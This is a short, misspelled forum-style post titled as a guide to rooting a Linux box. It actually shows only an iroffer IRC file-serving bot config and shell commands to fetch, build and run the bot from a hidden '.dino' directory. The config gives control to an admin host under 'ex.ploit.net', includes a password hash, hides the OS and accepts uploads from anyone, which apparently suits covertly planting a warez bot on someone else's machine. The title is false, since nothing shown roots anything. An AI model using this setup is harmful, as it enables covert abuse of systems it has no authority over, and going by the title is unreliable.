How to Root a liniux Box!

 config file:

 
adminhost *!*@*ex.ploit.net
adminpass <encrypted pass> (U5baRORPBKQIo)
autoignore_threshold 20
autoignore_exclude *!ex.ploit.net
connectionmethod direct
downloadhost *!*@*.*
extend_status_line
hideos yes
logrotate weekly
loginname coolbot
logstats yes
maxqueueditemsperperson 1
maxtransfersperperson 1
noduplicatefiles
notifytime 15
pidfile ./pid
punishslowusers 30
queuesize 50
restrictlist yes
restrictprivlistmsg piss off
restrictsend yes
restrictsend_timeout 30
slotsmax 15
smallfilebypass 2048
statefile ./state
transferminspeed 20
uploaddir /home/<user>/.dino/iroffer-dinoex-3.20/up
filedir /home/<user>/.dino/iroffer-dinoex-3.20/up
uploadhost *!*@*
user_modes +i
user_nick [Un-Dead]-0
user_realname undeadsBitch
waitafterjoin 200
network ex.ploit.net
server fake.server.com
channel #yourchannel

here are the commands :

 
mkdir .dino
cd .dino
wget  http://iroffer.dinoex.net/iroffer-dinoex-3.20.tar.gz

Extract:

tar -zxf iroffer-dinoex-3.20.tar.gz
cd iroffer-dinoex-3.20
./Configure
make

mkdir up
cd up

nano sam.config

paste the config file in nano

then 

 
cd ../

./iroffer -b sam.config

你可能感兴趣的:(linux,职场,root,休闲)